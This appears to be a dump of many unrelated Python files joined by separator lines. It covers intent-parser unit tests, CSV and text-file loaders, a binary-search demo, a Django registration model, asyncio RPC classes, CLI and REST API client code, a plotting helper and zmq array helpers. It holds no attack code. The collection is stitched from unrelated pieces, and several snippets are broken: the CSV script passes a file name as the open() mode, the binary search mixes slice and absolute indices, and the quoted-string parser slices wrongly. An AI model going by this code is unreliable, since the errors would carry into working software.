{"paragraph_index" : 0, "offset": 12, "end_offset" : 18, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test for overlaps comp inside query
search_results = [{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
if start_idx in match_idxs:
self.assertTrue(max_idx == match_max_idx[start_idx])
for m in matches[start_idx]:
self.assertTrue(search_results[m] in overlaps)
else:
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
####################################
# Test ignore idx
search_results = [{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 0, 1 : 1}
ignore_idx = [6,7]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results, ignore_idx)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
# Reverse of previous test
search_results = [{"paragraph_index" : 0, "offset": 2, "end_offset" : 6, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 10, "end_offset" : 20, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 4, "end_offset" : 10, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 12, "end_offset" : 16, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 18, "end_offset" : 25, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 1, "offset": 26, "end_offset" : 30, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 0, "end_offset" : 8, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 8, "end_offset" : 22, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 35, "end_offset" : 40, 'term' : 'test', 'text' : 'text'},
{"paragraph_index" : 0, "offset": 40, "end_offset" : 45, 'term' : 'test', 'text' : 'text'},
]
match_idxs = [0, 1]
matches = {0 : [0,6], 1 : [1,7]}
match_max_idx = {0 : 6, 1 : 7}
ignore_idx = [6,7]
for start_idx in range(len(search_results)):
overlaps, max_idx, overlap_idx = intent_parser_utils.find_overlaps(start_idx, search_results, ignore_idx)
self.assertTrue(overlaps == self.get_idx_for_search(search_results, overlap_idx))
self.assertTrue(len(overlaps) == 1)
self.assertTrue(overlaps[0] == search_results[start_idx])
def test_find_text(self):
"""
Basic check, ensure that spellcheck runs and the results are as expected
"""
# Basic sanity checks
partial_match_min_size = 3
partial_match_thresh = 0.75
#####
# Refuse a match when the dict term has a match, but the larger term is too large
text = 'M9'
paragraphs = [{'elements': [{'startIndex': 5696, 'endIndex': 5710, 'textRun': {'content': 'M9_glucose_CAA', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/M9_glucose_CAA/1'}}}}, {'startIndex': 5710, 'endIndex': 5712, 'textRun': {'content': ' \n', 'textStyle': {}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 100, 'direction': 'LEFT_TO_RIGHT', 'spacingMode': 'COLLAPSE_LISTS', 'avoidWidowAndOrphan': False}}]
abs_start_offset = 5693
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Refuse a match when the dict term and content are the same, the content is linked, and the link matches
text = 'MG1655_LPV3_LacI_Sensor_pTac_AmeR_pAmeR_YFP'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'MG1655_LPV3_LacI_Sensor_pTac_AmeR', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/MG1655_LPV3_LacI_Sensor_pTac_AmeR/1'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Make a match when the dict term and content are the same, the content is linked, but the link differs
text = 'M9 Media Salts'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 5147, 'endIndex': 5161, 'textRun': {'content': 'M9 media salts', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 11.5, 'unit': 'PT'}, 'link': {'url': 'https://hub.sd2e.org/user/sd2e/design/teknova_M1902/1'}}}}, {'startIndex': 5161, 'endIndex': 5249, 'textRun': {'content': ' (6.78 g/L Na2HPO4, 3 g/L KH2PO4, 1 g/L NH4Cl, 0.5 g/L NaCl; Sigma- Aldrich, MO, M6030)\n', 'textStyle': {'fontSize': {'magnitude': 11.5, 'unit': 'PT'}}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'direction': 'LEFT_TO_RIGHT', 'spacingMode': 'COLLAPSE_LISTS', 'indentFirstLine': {'magnitude': 18, 'unit': 'PT'}, 'indentStart': {'magnitude': 36, 'unit': 'PT'}}, 'bullet': {'listId': 'kix.ppm0fwxp8ech', 'textStyle': {'fontSize': {'magnitude': 11.5, 'unit': 'PT'}}}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 1)
text = 'MG1655'
abs_start_offset = 0
paragraphs = [{"elements": [
{
"startIndex": 3645,
"endIndex": 3676,
"textRun": {
"content": "1- a control strain (Wild-type ",
"textStyle": {}
}
},
{
"startIndex": 3676,
"endIndex": 3682,
"textRun": {
"content": "MG1655",
"textStyle": {}
}
},
{
"startIndex": 3682,
"endIndex": 3684,
"textRun": {
"content": ")\n",
"textStyle": {}
}
}
]}]
#####
# Refuse a match when the dict term has a match, but the larger term is too large
text = 'pTac'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'MG1655_LPV3_LacI_Sensor_pTac_AmeR', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
#####
# Refuse a match when the dict term has a match, but it is too small
text = 'YG_plasmid_002'
abs_start_offset = 0
paragraphs = [{'elements': [{'startIndex': 196, 'endIndex': 229, 'textRun': {'content': 'plasmid', 'textStyle': {'underline': True, 'foregroundColor': {'color': {'rgbColor': {'red': 0.06666667, 'green': 0.33333334, 'blue': 0.8}}}, 'fontSize': {'magnitude': 10, 'unit': 'PT'}}}}, {'startIndex': 229, 'endIndex': 230, 'textRun': {'content': '\n', 'textStyle': {'bold': True}}}], 'paragraphStyle': {'namedStyleType': 'NORMAL_TEXT', 'lineSpacing': 115, 'direction': 'LEFT_TO_RIGHT', 'avoidWidowAndOrphan': False}}]
results = intent_parser_utils.find_text(text, abs_start_offset, paragraphs, partial_match_min_size, partial_match_thresh)
self.assertTrue(len(results) == 0)
def test_find_common_substrings(self):
"""
Basic check, ensure that spellcheck runs and the results are as expected
"""
############
content = 'm9 + glucose + caa:\n'
term = 'm9'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
self.assertTrue(len(matches) == 1)
self.assertTrue(matches[0].size == 2)
self.assertTrue(matches[0].content_word_length == 2)
############
content = '}, plate_{proteomics} \n'
term = 'proteomics'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
self.assertTrue(len(matches) == 1)
self.assertTrue(matches[0].size == 10)
self.assertTrue(matches[0].content_word_length == 10)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'L-arabinose'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=14, b=2, size=9, content_word_length=9), IPSMatch(a=32, b=2, size=9, content_word_length=9)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'proteomics'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=4, b=1, size=9, content_word_length=9), IPSMatch(a=24, b=0, size=7, content_word_length=7)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'Dna roteomics arabinose proteom arabinose\n'
term = 'proteo'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=4, b=1, size=5, content_word_length=9), IPSMatch(a=24, b=0, size=6, content_word_length=7)]
self.assertTrue(len(matches) == 2)
self.assertTrue(gt_match == matches)
############
content = 'arabinose\n'
term = 'L-arabinose'
matches = intent_parser_utils.find_common_substrings(content.lower(), term.lower(), IntentParserServer.PARTIAL_MATCH_MIN_SIZE, IntentParserServer.PARTIAL_MATCH_THRESH)
gt_match = [IPSMatch(a=0, b=2, size=9, content_word_length=9)]
self.assertTrue(len(matches) == 1)
self.assertTrue(gt_match == matches)
def tearDown(self):
"""
Perform teardown.
"""
pass
if __name__ == "__main__":
unittest.main()
|
import sys, argparse, csv
parser = argparse.ArgumentParser(description='csv to postgres',\
fromfile_prefix_chars="@" )
parser.add_argument('file', help='csv file to import', action='store')
args = parser.parse_args()
csv_file = args.file
with open(csv_file, 'Crime.csv') as csvfile:
for line in csvfile.readlines():
array = line.split(',')
first_item = array[0]
num_columns = len(array)
csvfile.seek(0)
reader = csv.reader(csvfile, delimiter=' ')
included_cols = [3,9]
for row in reader:
content = list(row[i] for i in included_cols)
print(content)
|
class FileLoader(object):
def __init__(self, fname, coltypes = {}, separator = None):
self.types = coltypes
if type(fname) == str:
ofile = open(fname)
else:
ofile = fname
self.rows = [x.split(separator) for x in ofile]
def __getitem__(self, *args):
index = args[0]
if type(index) != int:
raise TypeError("The index must be an integer, but I got '%s'" % index)
row = tuple(self.types.get(colno, str)(colval)
for (colno, colval)
in enumerate(self.rows[index]))
return row
def __iter__(self):
class IterObject(object):
def __init__(self, fl):
self.iterable = fl
self.pointer = 0
def next(self):
try:
val = self.iterable[self.pointer]
self.pointer += 1
return val
except IndexError:
raise StopIteration
return IterObject(self)
class WheelLoader(object):
def __init__(self, fname):
if type(fname) == str:
ofile = open(fname)
else:
ofile = fname
self.rows = [self.splitRow(x) for x in ofile]
def splitRow(self, string):
elements = []
partial = string.lstrip()
while partial:
if partial[0] == "'":
elem, partial = self.__processString(partial)
else:
elem, partial = [x.lstrip() for x in self.__processNonString(partial)]
elements.append(elem)
return elements
def __processNonString(self, string):
splitted = string.split(' ', 1)
if len(splitted) < 2:
rest = ""
else:
rest = splitted[1].lstrip()
return splitted[0].strip(), rest
def __processString(self, string):
retval = ""
done = False
partial = string[1:]
while not done:
end = partial.find("'")
if end == -1:
raise ValueError("Missing end quote in [%s]" % string)
retval += partial[:end]
partial = partial[end+1:]
if partial.startswith("'"):
retval += "'"
partial = partial[end+1:]
if not partial.startswith(" "):
retval += "'"
else:
partial = partial.lstrip()
done = True
return retval, partial
def __getitem__(self, *args):
index = args[0]
if type(index) != int:
raise TypeError("The index must be an integer, but I got '%s'" % index)
return tuple(self.rows[index])
def __iter__(self):
class IterObject(object):
def __init__(self, fl):
self.iterable = fl
self.pointer = 0
def next(self):
try:
val = self.iterable[self.pointer]
self.pointer += 1
return val
except IndexError:
raise StopIteration
return IterObject(self)
example_file = """0 1050.0 1013.92
1 1050.0 1025.65
2 1138.3 1010.90
3 1118.9 1050.0
4 1119.0 995.0
5 1050.0 1006.98
6 1050.0 1015.05
7 1050.0 1011.7
9 1021.0 880.0
10 1182.0 997.0
11 1116.0 999.9
12 1132.0 996.8
13 1220.0 992.0
14 750.0 1003.7
15 1107.0 902.1
16 999.9 999.8
17 1050.0 1015.0
33 1212. 1212.4
34 1086. 1080.
37 1152. 1370.
40 687. 1011.
55 1063.05 936.63
66 1181.69 1266.05
77 1175.0 1047.0
88 1103.9 1025.0
"""
example_wheel_file = """0 'Open' 0
1 'Hal_rs45 696_5' 58
2 'u'_Slo 350_65' 82
3 'u'_Slo 353_55' 109
4 'Halp 656_3' 21
5 'Cont 662_4' 77
6 '[SII] 672_5' 123
"""
if __name__ == '__main__':
from StringIO import StringIO
print "Sample: 6th row with no converters"
print FileLoader(StringIO(example_file))[5]
print
print "Sample: 6th row with converters = {0: int, 1:float}"
print FileLoader(StringIO(example_file),
coltypes = {0: int, 1:float})[5]
print
print "Sample: Iterate over the whole file; converters = {0: int, 1:float, 2:float}"
fl = FileLoader(StringIO(example_file),
coltypes = {0: int, 1:float, 2:float})
for tpl in fl:
print tpl
print "Sample: Iterate over a wheel file"
fl = WheelLoader(StringIO(example_wheel_file))
for tpl in fl:
print tpl
|
#!/usr/bin/python3
import time
numbers = [2, 56, 90, 8076, 32, 46, 24, 13, 87, 7, 34, 923]
number = 24
start = 0
end = len(numbers) -1
counter = 0
numbers.sort()
while True:
time.sleep(2)
counter += 1
print("\nAttempt:", counter)
print("Slice:", numbers[start:end])
idx = len(numbers[start:end]) // 2
print("Index:", idx)
guess = numbers[start:end][idx]
print("Guess:", guess)
if number == guess:
print("Found it:", guess)
break
elif number < guess:
end = idx
print("Number is less than", guess)
elif number > guess:
start = idx
print("Number is greater than", guess)
|
from __future__ import unicode_literals
from json import dumps, loads
import requests
from django.db import models
from django.utils.translation import ugettext_lazy as _
from solo.models import SingletonModel
from installation.models import Installation
from lock_manager import Lock, LockError
from .literals import FORM_KEY, FORM_RECEIVER_FIELD, FORM_SUBMIT_URL, TIMEOUT
from .exceptions import AlreadyRegistered
class RegistrationSingleton(SingletonModel):
_cached_name = None
_registered = None
registered = models.BooleanField(default=False, verbose_name=_('Registered'))
registration_data = models.TextField(verbose_name=_('Registration data'), blank=True)
@classmethod
def registration_state(cls):
if cls._registered:
return cls._registered
else:
instance = cls.objects.get()
if instance.is_registered:
cls._registered = instance.is_registered
return instance.is_registered
@classmethod
def registered_name(cls):
if cls._cached_name:
return cls._cached_name
else:
instance = cls.objects.get()
try:
dictionary = loads(instance.registration_data)
except ValueError:
dictionary = {}
name_value = dictionary.get('company') or dictionary.get('name')
if name_value:
cls._cached_name = name_value
return name_value or _('No name')
@property
def is_registered(self):
return self.registered
def register(self, form_data):
if self.is_registered:
raise AlreadyRegistered
installation = Installation.objects.get()
dictionary = {}
dictionary.update(form_data)
dictionary.update({
'uuid': installation.uuid
})
self.registration_data = dumps(dictionary)
self.save()
self.submit()
def submit(self):
try:
lock = Lock.acquire_lock('upload_registration')
except LockError:
pass
else:
try:
requests.post(FORM_SUBMIT_URL, data={'formkey': FORM_KEY, FORM_RECEIVER_FIELD: self.registration_data}, timeout=TIMEOUT)
except Exception:
raise
else:
self.registered = True
self.save()
finally:
lock.release()
class Meta:
verbose_name = verbose_name_plural = _('Registration properties')
|
from asyncio import BaseEventLoop, WriteTransport, SubprocessTransport, Transport
from threading import Thread
from concurrent.futures import Future
from amino import Dat, List, ADT, Maybe, Nothing, Just, Path
from amino.logging import module_log
from ribosome.rpc.concurrency import OnMessage, OnError
from ribosome.rpc.error import processing_error, RpcReadErrorUnknown
log = module_log()
class AsyncioPipes(ADT['AsyncioPipes']):
pass
class AsyncioEmbed(AsyncioPipes):
def __init__(self, proc: List[str]) -> None:
self.proc = proc
class AsyncioStdio(AsyncioPipes):
pass
class AsyncioSocket(AsyncioPipes):
def __init__(self, path: Path) -> None:
self.path = path
class AsyncioLoopThread(Dat['AsyncioLoopThread']):
def __init__(self, thread: Maybe[Thread]) -> None:
self.thread = thread
def update(self, thread: Thread) -> None:
self.thread = Just(thread)
def reset(self) -> None:
self.thread = Nothing
class AsyncioResources(Dat['AsyncioResources']):
@staticmethod
def cons(
transport: Future,
) -> 'AsyncioResources':
return AsyncioResources(
transport,
)
def __init__(self, transport: Future) -> None:
self.transport = transport
class Asyncio(Dat['Asyncio']):
@staticmethod
def cons(
loop: BaseEventLoop,
pipes: AsyncioPipes,
resources: AsyncioResources,
thread: AsyncioLoopThread=None,
) -> 'Asyncio':
return Asyncio(loop, pipes, resources, thread or AsyncioLoopThread(Nothing))
def __init__(
self,
loop: BaseEventLoop,
pipes: AsyncioPipes,
resources: AsyncioResources,
thread: AsyncioLoopThread,
) -> None:
self.loop = loop
self.pipes = pipes
self.resources = resources
self.thread = thread
class EmbedProto(Dat['EmbedProto']):
def __init__(self, asio: Asyncio, on_message: OnMessage, on_error: OnError) -> None:
self.asio = asio
self.on_message = on_message
self.on_error = on_error
def connection_made(self, transport: SubprocessTransport) -> None:
self.asio.resources.transport.set_result(transport.get_pipe_transport(0))
def connection_lost(self, exc: Exception) -> None:
pass
def pipe_connection_lost(self, fd: int, exc: Exception) -> None:
pass
def pipe_data_received(self, fd: int, data: bytes) -> None:
if fd == 1:
self.on_message(data).attempt.leffect(processing_error(data))
else:
self.on_error(RpcReadErrorUnknown(data or b'no error message')).attempt.leffect(processing_error(None))
def process_exited(self) -> None:
pass
class BasicProto(Dat['BasicProto']):
def __init__(self, asio: Asyncio, on_message: OnMessage, on_error: OnError) -> None:
self.asio = asio
self.on_message = on_message
self.on_error = on_error
def connection_made(self, transport: Transport) -> None:
try:
if isinstance(transport, WriteTransport):
self.asio.resources.transport.set_result(transport)
except Exception as e:
log.caught_exception(f'setting transport {transport}', e)
def connection_lost(self, exc: Exception) -> None:
pass
def data_received(self, data: bytes) -> None:
self.on_message(data).attempt.leffect(processing_error(data))
def eof_received(self) -> None:
pass
__all__ = ('EmbedProto', 'BasicProto', 'AsyncioPipes', 'AsyncioEmbed', 'AsyncioStdio', 'AsyncioSocket',
'AsyncioLoopThread', 'AsyncioResources', 'Asyncio',)
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
"""The 'source-git' subcommand for Packit"""
import click
from packit.cli.update_dist_git import update_dist_git
from packit.cli.update_source_git import update_source_git
from packit.cli.source_git_init import source_git_init
from packit.cli.source_git_status import source_git_status
@click.group("source-git")
def source_git():
"""Subcommand to collect source-git related functionality"""
pass
source_git.add_command(update_dist_git)
source_git.add_command(update_source_git)
source_git.add_command(source_git_init)
source_git.add_command(source_git_status)
|
import json
from oneparams.api.base_diff import BaseDiff
from oneparams.utils import create_email, string_normalize
class ApiCliente(BaseDiff):
items = {}
list_details = {}
first_get = False
def __init__(self):
self.url_get_all = "/CliForCols/ListaDetalhesClientes"
super().__init__(
key_id="clienteId",
key_name="nomeCompleto",
key_active="ativoCliente",
item_name="client",
url_create="/OCliForColsUsuarioPerfil/CreateClientes",
url_update="/OCliForColsUsuarioFiliais/UpdateClientes",
url_get_all=self.url_get_all,
url_get_detail="/OCliente/Detalhesclientes",
key_detail="clientesCliForColsLightModel",
url_delete="/OCliForColsUsuario/DeleteCliente",
url_inactive="/OCliForColsUsuarioFiliais/UpdateClientes"
)
if not ApiCliente.first_get:
self.get_all()
ApiCliente.first_get = True
def get_all(self):
print("researching {}".format(self.item_name))
ApiCliente.items = {}
response = self.get(f'{self.url_get_all}/true')
self.status_ok(response)
content = json.loads(response.content)
for i in content:
ApiCliente.items[i["cliForColsId"]] = {
self.key_id: i["cliForColsId"],
self.key_active: True,
self.key_name: i[self.key_name],
"email": i["email"]
}
response = self.get(f'{self.url_get_all}/false')
content = json.loads(response.content)
for i in content:
ApiCliente.items[i["cliForColsId"]] = {
self.key_id: i["cliForColsId"],
self.key_active: False,
self.key_name: i[self.key_name],
"email": i["email"]
}
def add_item(self, data: dict, response: dict) -> int:
data = {
self.key_active: data[self.key_active],
self.key_name: data[self.key_name],
"email": data["email"]
}
return super().add_item(data, response)
def equals(self, data):
if data["email"] is None:
data.pop("email")
if data["celular"] is None:
data.pop("celular")
return super().equals(data)
def create(self, data):
if data["email"] is None:
data["email"] = create_email()
if data["celular"] is None:
data["celular"] = "00000000"
super().create(data)
def update(self, data):
if "email" not in data.keys():
data["email"] = self.details(data[self.key_id])["email"]
if "celular" not in data.keys():
data["celular"] = self.details(data[self.key_id])["celular"]
return super().update(data)
def item_id(self, data):
name = string_normalize(data[self.key_name]).strip()
for key, item in self.items.items():
existent_name = string_normalize(item[self.key_name]).strip()
if (existent_name == name
or item["email"] == data["email"]):
return key
return 0
|
from collections import deque
water_quantity = int(input())
names = deque([])
while True:
name = input()
if name == "Start":
break
names.append(name)
while True:
commands = input().split()
if commands[0] == "End":
print(f"{water_quantity} liters left")
break
elif commands[0] == "refill":
added_water = int(commands[1])
water_quantity += added_water
else:
person_liters = int(commands[0])
if int(person_liters) > water_quantity:
person = names[0]
print(f"{person} must wait")
names.popleft()
continue
print(f"{names[0]} got water")
water_quantity -= int(person_liters)
names.popleft()
|
from typing import Iterable
import matplotlib.axis
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
def rename_teachers(data: pd.DataFrame):
dic = {
"leitner": "Leitner",
"forward": "Conservative\nsampling",
"threshold": "Myopic",
}
for k, v in dic.items():
data["teacher"] = data["teacher"].replace([k], v)
return data
def boxplot_n_learnt(data: pd.DataFrame,
ax: matplotlib.axes._axes.Axes = None,
ylim: Iterable = None,
x_label: str = "Teacher",
y_label: str = "Learned",
dot_size: int = 3,
dot_alpha: float = 0.7):
if ax is None:
fig, ax = plt.subplots()
data = rename_teachers(data)
data = data.rename(columns={
"n_learnt": y_label,
"teacher": x_label
})
order = ["Leitner", "Myopic", "Conservative\nsampling"]
colors = ["C0", "C1", "C2"]
sns.boxplot(x=x_label, y=y_label, data=data, ax=ax,
palette=colors, order=order,
showfliers=False)
sns.stripplot(x=x_label, y=y_label, data=data, s=dot_size,
color="0.25", alpha=dot_alpha, ax=ax, order=order)
ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=13)
if ylim is not None:
ax.set_ylim(*ylim)
ax.set_xlabel("")
|
from pycanlii.legislation import Legislation
from pycanlii.enums import Language, LegislationType, DateScheme
class TestLegislation:
def test__init__(self, legis_en, legis_fr, config):
en = Legislation(legis_en, config['key'], Language.en)
fr = Legislation(legis_fr, config['key'], Language.fr)
assert en.databaseId == legis_en['databaseId']
assert en.legislationId == legis_en['legislationId']
assert en.title == legis_en['title']
assert en.citation == legis_en['citation']
assert en.type == LegislationType[legis_en['type'].capitalize()]
assert en._key == config['key']
assert en._lang == Language.en
assert fr.databaseId == legis_fr['databaseId']
assert fr.legislationId == legis_fr['legislationId']
assert fr.title == legis_fr['title']
assert fr.citation == legis_fr['citation']
assert fr.type == LegislationType[legis_fr['type'].capitalize()]
assert fr._key == config['key']
assert fr._lang == Language.fr
def test_content(self, legislation):
legislation.content
def test__iter__(self, canlii):
db = canlii.legislation_databases()
for legis in db:
pass
def test__getitem__(self, canlii):
db = canlii.legislation_databases()
db[5]
def test_url(self, legislation, legis_en):
assert legislation.url == legis_en['url']
def test_dateScheme(self, legislation, legis_en):
assert legislation.dateScheme == DateScheme[legis_en['dateScheme']]
def test_startDate(self, legislation, legis_en):
assert legislation.startDate == legis_en['startDate']
def test_endDate(self, legislation, legis_en):
assert legislation.endDate == legis_en['endDate']
def test_repealed(self, legislation, legis_en):
if legis_en['repealed'] == "NO":
assert legislation.repealed == False
else:
assert legislation.repealed == True
|
#!/usr/bin/env python
import sys
import zmq
import numpy
def init_sockets(source, destination):
context = zmq.Context()
receiver = context.socket(zmq.PULL)
receiver.bind(source)
sender = context.socket(zmq.PUSH)
sender.connect(destination)
return receiver, sender
def send_array(socket, A, flags=0, copy=True, track=False):
"""send a numpy array with metadata"""
md = dict(
dtype = str(A.dtype),
shape = A.shape,
)
socket.send_json(md, flags|zmq.SNDMORE)
return socket.send(A, flags, copy=copy, track=track)
def recv_array(socket, flags=0, copy=True, track=False):
"""recv a numpy array"""
md = socket.recv_json(flags=flags)
msg = socket.recv(flags=flags, copy=copy, track=track)
buf = memoryview(msg)
A = numpy.frombuffer(buf, dtype=md['dtype'])
return A.reshape(md['shape'])
|
# coding: utf-8
